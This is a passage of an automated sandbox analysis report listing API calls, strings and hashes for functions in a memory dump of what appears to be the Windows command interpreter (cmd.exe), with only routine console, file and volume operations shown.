                                    • API String ID: 686027947-4257191772
                                    • Opcode ID: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction ID: 66505b56df8f293d09b86d5a0b2db156b08ff371d17eb2aad300261ee6bbb50f
                                    • Opcode Fuzzy Hash: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction Fuzzy Hash: AC51F870A00214ABEF28CBE8FC4DBBE7AF9EF45724F110219F925E22C4DB7199458751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011DCEDD
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 011DCF19
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD005
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD01B
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD031
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD047
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD05D
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD073
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD085
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD09B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DCF8F
                                    • exit.MSVCRT ref: 011EB424
                                    • _wcsupr.MSVCRT ref: 011EB475
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                    • API String ID: 2336066422-4197029667
                                    • Opcode ID: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction ID: b3eeafd94dc2fe9e9e3be91e5d79259d8d0dbc66d93d7a167d8106944e83d4a4
                                    • Opcode Fuzzy Hash: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction Fuzzy Hash: 6651E531B0461A97DF2CDBA5985C6FFB7A5EFA0108B04449DE817A3184DF349D45CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?,?,?,?,?), ref: 011E34B1
                                    • towupper.MSVCRT ref: 011E34C6
                                    • iswalpha.MSVCRT ref: 011E34DB
                                    • towupper.MSVCRT ref: 011E34FB
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 011E3527
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E35CA
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E3617
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 011E3648
                                    • _local_unwind4.MSVCRT ref: 011EDC44
                                    • _local_unwind4.MSVCRT ref: 011EDC66
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                    • String ID:
                                    • API String ID: 2497804757-0
                                    • Opcode ID: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction ID: 53e1ceb35c4a0677ef4ab30f813ccce29622c1e74c3a517601df7f046761f210
                                    • Opcode Fuzzy Hash: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                    • Instruction Fuzzy Hash: F7B1E130E109169ADF2CEBE8E84CAFDB7F4FF14200F454569E52AD3290EB719A80CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: wcschr$iswspacelongjmp
                                    • String ID: =,;
                                    • API String ID: 4008636219-1539845467
                                    • Opcode ID: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction ID: 43664dc3122cc4c10c3e97e971d26d6a92d415cc76c40dbf87aaba725fab154d
                                    • Opcode Fuzzy Hash: 090fd844132778b0661caa7d76ff908c2c05b314ef849060a375e3c381cf35fc
                                    • Instruction Fuzzy Hash: A4D12775A01612CBDF3C9F6CD8487BE7BE5EF4020AF14446EE9469F281EB749980CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011FBA0F
                                    • memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    • _wcsicmp.MSVCRT ref: 011FBB28
                                    • _wcsicmp.MSVCRT ref: 011FBB4D
                                    • _wcsicmp.MSVCRT ref: 011FBB75
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB8F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FBB99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                    • String ID: CSVFS$NTFS$REFS
                                    • API String ID: 3510147486-2605508654
                                    • Opcode ID: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction ID: 3db9261824c524a6b4d51de2342579f8ebcffa884e9a100c7a087b82e7a779f9
                                    • Opcode Fuzzy Hash: f5cb1b98b98330f5ca5b9354e9a59bc48fd6f4c930044e61112adaf2d658705a
                                    • Instruction Fuzzy Hash: A1515971A0421D9FEF39CAA5DC88BEBBBB8EF14254F4400ADE605D3145DB74DA84CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                    • API String ID: 2081463915-3124875276
                                    • Opcode ID: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction ID: 1c8a1eec7a84777907af1baae7f2797f17b6388be35321655d3d405e1e917a4b
                                    • Opcode Fuzzy Hash: 8e707505f1527dff521f1d85b8678826c74bf4a0f7a09bff22bbc1ba2f659c02
                                    • Instruction Fuzzy Hash: 3A4128313007069AEB3DAF39F869B6A7BA5EB5462CF54012FE213865C1EF72D181C711
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E06D8
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                    • _get_osfhandle.MSVCRT ref: 011E06EF
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                    • _get_osfhandle.MSVCRT ref: 011E071E
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                    • _get_osfhandle.MSVCRT ref: 011E0750
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                    • _get_osfhandle.MSVCRT ref: 011E0794
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E079E
                                    • _get_osfhandle.MSVCRT ref: 011ECC28
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011ECC32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID: CMD.EXE
                                    • API String ID: 1606018815-3025314500
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                    • API String ID: 0-366822981
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,0120B980,00002000,00000000,00000000,?,00000000), ref: 011DC735
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0120B980,00002000,?), ref: 011DC777
                                    • _ultoa.MSVCRT ref: 011EAF0E
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EAF17
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 011EAF38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                    • String ID: Application$System
                                    • API String ID: 3538039442-3455788185
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                    • API String ID: 2081463915-3874590324
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • wcsrchr.MSVCRT ref: 011F47C1
                                    • wcschr.MSVCRT ref: 011F47D7
                                    • wcsrchr.MSVCRT ref: 011F4809
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F4828
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4838
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4854
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F485C
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4870
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4891
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 011F48BE
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4914
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4935
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                    • String ID:
                                    • API String ID: 4166807220-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 011DC489
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC490
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000), ref: 011DC4A6
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011DC4AD
                                    • _wcsicmp.MSVCRT ref: 011DC538
                                    • _wcsicmp.MSVCRT ref: 011DC54A
                                    • _wcsicmp.MSVCRT ref: 011DC577
                                    • _wcsicmp.MSVCRT ref: 011EA932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap_wcsicmp$AllocProcess
                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                    • API String ID: 435930816-3086019870
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011FA879
                                    • memset.MSVCRT ref: 011FA8A1
                                    • memset.MSVCRT ref: 011FA8C9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011FA9F1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 011FA9FB
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 011FAA0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB45
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB52
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$ErrorLast$InformationVolume
                                    • String ID: %04X-%04X
                                    • API String ID: 2748242238-1126166780
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E3160
                                    • memset.MSVCRT ref: 011E3180
                                    • memset.MSVCRT ref: 011E31A9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011E32AB
                                    • _wcsicmp.MSVCRT ref: 011E32C9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32DF
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32E9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$InformationVolume_wcsicmp
                                    • String ID: FAT
                                    • API String ID: 4247940253-238207945
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011DAD95
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 011DADEA
                                    • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 011DAE0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DAE68
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 011F128D
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • wcsstr.MSVCRT ref: 011F1249
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F1266
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F12A5
                                      • Part of subcall function 011E68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                    • String ID: \\.\
                                    • API String ID: 52035941-2900601889
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB4FB
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB508
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,00000000), ref: 011FAF84
                                    • qsort.MSVCRT ref: 011FB007
                                    • wcschr.MSVCRT ref: 011FB05C
                                    • calloc.MSVCRT ref: 011FB09E
                                    • calloc.MSVCRT ref: 011FB16F
                                    • wcschr.MSVCRT ref: 011FB1B8
                                    • memcpy.MSVCRT ref: 011FB20A
                                    • memcpy.MSVCRT ref: 011FB22B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 975110957-381716982
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F3DED
                                    • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 011F3F21
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 011F3F4E
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 011F3F5B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 011F3F65
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 011F3FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: LocalTime$ErrorLast$_get_osfhandle
                                    • String ID: %s$/-.$:
                                    • API String ID: 1033501010-879152773
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp$iswspace
                                    • String ID: =,;$FOR/?
                                    • API String ID: 759518647-2121398454
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                    • String ID: +-~!
                                    • API String ID: 2191331888-2604099254
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,011F2CF5), ref: 011F214C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ObjectSingleWait
                                    • String ID: wil
                                    • API String ID: 24740636-1589926490
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 011F7CB9
                                    • _ultoa.MSVCRT ref: 011F7CCF
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011F7CD8
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,011FA21D,000000FF,?,00000020), ref: 011F7CF9
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 011F7D31
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 011F7D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                    • String ID: (#$Application$System
                                    • API String ID: 3377411628-593978566
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88A8
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88B8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0650
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0662
                                    • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F067E
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F068D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                    • String ID: :$\
                                    • API String ID: 3961617410-1166558509
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E2E1C
                                    • memset.MSVCRT ref: 011E2E40
                                    • memset.MSVCRT ref: 011E2E64
                                    • memset.MSVCRT ref: 011E2E88
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F81
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F8E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F9B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2FA5
                                      • Part of subcall function 011E4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
